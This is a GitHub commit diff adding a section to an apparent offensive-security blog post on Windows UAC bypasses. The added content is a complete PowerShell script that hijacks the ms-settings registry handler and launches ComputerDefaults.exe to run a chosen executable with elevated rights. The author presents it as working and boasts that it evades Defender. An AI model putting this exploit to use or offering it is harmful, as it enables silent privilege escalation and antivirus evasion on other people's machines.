Skip to content

Commit 2d630f5

Browse files
authored
Update 2024-10-16-Creative UAC Bypass Methods for the Modern Era.md
1 parent 5124137 commit 2d630f5

File tree

1 file changed

+9
-0
lines changed

1 file changed

+9
-0
lines changed

Diff for: _posts/2024-10-16-Creative UAC Bypass Methods for the Modern Era.md

+9
Original file line numberDiff line numberDiff line change
@@ -94,6 +94,15 @@ Bring it all together and you get the following:
9494

9595
![image](https://github.com/user-attachments/assets/872b4dcf-94f2-439c-a30c-8df6c75b2101)
9696

97+
Final code:
98+
99+
```powershell
100+
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
101+
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
102+
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "../../myfolder/barney.exe" -Force
103+
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
104+
```
105+
97106
And there you have it. An age old UAC Bypass technique that still works, still bypasses UAC and STILL EVADES DEFENDER! The irony is it's easier than all the other methods I posted last year.
98107
Think smarter not harder I guess. Okay, I feel better about this blog post now. I couldn't sit idly by while folks found this page and were likely immediately disappointed because none of the techniques I shared were still relevent. Now there's at least one 😙 Until next time!
99108

0 commit comments

Comments
 (0)